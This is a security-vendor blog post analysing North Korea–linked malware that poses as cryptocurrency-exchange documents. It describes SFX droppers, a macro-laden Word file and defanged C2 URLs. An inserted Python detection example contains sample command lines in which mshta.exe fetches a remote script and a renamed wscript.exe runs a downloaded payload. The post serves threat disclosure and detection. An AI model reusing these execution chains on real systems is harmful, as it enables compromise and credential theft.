Distribution of Malware Disguised as Coin and Investment-related Content – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) has recently confirmed the distribution of malware disguised with coin exchange and investment-related topics. The malware is being distributed in the form of an executable and a Word file. Based on the User-Agent name used in the malware, it is suspected that it was created by the Kimsuky group. The confirmed filenames are as follows:

Date   Filename
07.17  20230717_030190045911.pdf .exe
07.28  0728-We**Wallet Automatic Withdrawal of Funds.docx.exe (assumed)
07.28  230728 We**Team – Wallet Hacking Similarities.docx.exe (assumed)
07.28  We** Team – Ban on Cloud Usage.doc
Table 1. Confirmed filenames

Executables

The executables identified in Table 1 are disguised with Word document and PDF icons, making them appear like normal files.

Figure 1. Icons of executables

The above malicious executables are in the form of self-extracting archives (SFX) containing normal files within. Therefore, when the file is executed, the following normal document files are generated.

Figure 2. Normal document files created by each executable

Each document file contains content impersonating asset management and coin exchanges. The contents of each document are as follows.

Figure 3. 20230717_030190045911.pdf
Figure 4. 0728-We**Wallet Automatic Withdrawal of Funds.docx.exe
Figure 5. 230728 We**Team – Wallet Hacking Similarities.docx.exe

The archive content of each executable includes the normal documents identified in Figure 2, along with a command to access a specific URL.

Figure 6. Archive content of the executables

As a result, upon executing a file, a normal document is generated, and mshta.exe is utilized to execute the script code present in the malicious URL. At the time of analysis, access to the mentioned URL was not possible, so the exact behavior could not be confirmed. Below are the confirmed malicious URLs.

  • hxxps://partner24[.]kr/mokozy/hope/biz.php
  • hxxps://partner24[.]kr/mokozy/hope/doc1.php
  • hxxps://partner24[.]kr/mokozy/hope/doc2.php

Document File

Aside from the aforementioned SFX-type executables, the threat actor appears to have also distributed a Word document containing a VBA macro. The identified document file also bears the same disguising filename as the malicious executables, as it pretends to be related to coin exchange.

When the document file is opened, the text color in the body is set to gray, as shown below, manipulating users into clicking the Enable Content button. Upon clicking this button, the VBA macro code embedded in the document is executed, changing the text color in the body to black, as seen in Figure 8, enabling users to view the content.

Figure 7. Contents of the document file
Figure 8. Contents of the document file after the macro is run

When the VBA macro embedded in the document is executed, the normal wscript.exe file in the %windir%\system32 directory is copied under the name word.exe in the %appdata% folder. Afterward, it downloads an additional Base64-encoded script from hxxps://partner24[.]kr/mokozy/hope/kk.php before decoding it and saving it in the %USERPROFILE% folder as set.sl. The created set.sl file is executed with the following command.

  • cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl
Figure 9. A part of the VBA macro code

At the time of analysis, the code downloaded from hxxps://partner24[.]kr/mokozy/hope/kk.php did not perform any particular malicious behaviors, but various malicious commands can be executed through it according to the threat actor’s intent. The code saved in set.sl at the time of analysis is as follows.

Figure 10. Contents of the created set.sl file

Considering that the malware in question uses Chnome instead of Chrome as the User-Agent in the macro code shown in Figure 9, the Kimsuky group is suspected to have created it. (1) Furthermore, the fact that both the executables and document file share the same coin exchange name in their filenames and connect to the same C2 address suggests that the executables were also created by the same threat group.
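The behaviours described above (mshta.exe fetching a remote script, a copy of wscript.exe renamed to word.exe and run with //e:vbscript on a non-.vbs file, and the "Chnome" User-Agent) can each be turned into a telemetry check. The following is an added example, not code from ASEC; the events, proxy lines, user name and example.invalid host are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation events (not from the ASEC report).
# Event 0 mimics the SFX stage, event 1 the macro stage, event 2 is benign.
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://example.invalid/mokozy/hope/doc1.php",
     "OriginalFileName": "MSHTA.EXE"},
    {"Image": r"C:\Users\victim\AppData\Roaming\word.exe",
     "CommandLine": r"C:\Users\victim\AppData\Roaming\word.exe //e:vbscript //b C:\Users\victim\set.sl",
     "OriginalFileName": "wscript.exe"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Scripts\logon.vbs",
     "OriginalFileName": "wscript.exe"},
]

# Constructed proxy log lines; the second carries the "Chnome" typo noted above.
PROXY_LINES = [
    'GET http://example.invalid/ "Mozilla/5.0 (Windows NT 10.0) Chrome/115.0"',
    'GET http://example.invalid/mokozy/hope/kk.php "Mozilla/5.0 (Windows NT 10.0) Chnome/115.0"',
]

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def mshta_remote_script(ev):
    # mshta.exe given an http(s) URL instead of a local .hta file
    return _basename(ev["Image"]) == "mshta.exe" and bool(re.search(r"https?://", ev["CommandLine"], re.I))

def renamed_wscript(ev):
    # PE metadata says wscript.exe but the on-disk name differs (e.g. word.exe in %appdata%)
    return ev["OriginalFileName"].lower() == "wscript.exe" and _basename(ev["Image"]) != "wscript.exe"

def vbscript_engine_override(ev):
    # //e:vbscript forces the VBScript engine on a file with a non-script extension (set.sl)
    return "//e:vbscript" in ev["CommandLine"].lower()

def chnome_user_agent(line):
    return re.search(r"\bChnome/", line) is not None

def scan(events=PROCESS_EVENTS, proxy=PROXY_LINES):
    """Return (rule_name, index) pairs for every event or proxy line that matches."""
    hits = []
    for i, ev in enumerate(events):
        for rule in (mshta_remote_script, renamed_wscript, vbscript_engine_override):
            if rule(ev):
                hits.append((rule.__name__, i))
    for i, line in enumerate(proxy):
        if chnome_user_agent(line):
            hits.append(("chnome_user_agent", i))
    return hits
```

Run on the constructed data, scan() flags the mshta event, the renamed wscript event twice (rename and engine override) and the Chnome proxy line, while the benign wscript.exe logon script produces no hit.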

Currently, the exact script that is ultimately executed cannot be identified due to the C2 being inaccessible. However, given the potential for various malicious behaviors such as exfiltrating user credentials and downloading additional malware, users should exercise extra caution.

[File Detection]
Downloader/DOC.Generic (2023.07.28.03)
Downloader/Win.Agent (2023.07.31.03)

[Behavior Detection by AhnLab Product Type]
V3: Execution/MDP.Wscript.M4703
V3: Execution/MDP.Wscript.M11242
EDR: Execution/EDR.Wscript.M11243
EDR: Execution/EDR.Mshta.M11245
MDS: Execution/MDP.Mshta.M4704
MDS: Execution/MDP.Mshta.M11244


[References]
(1) https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/


Source: https://asec.ahnlab.com/en/55944/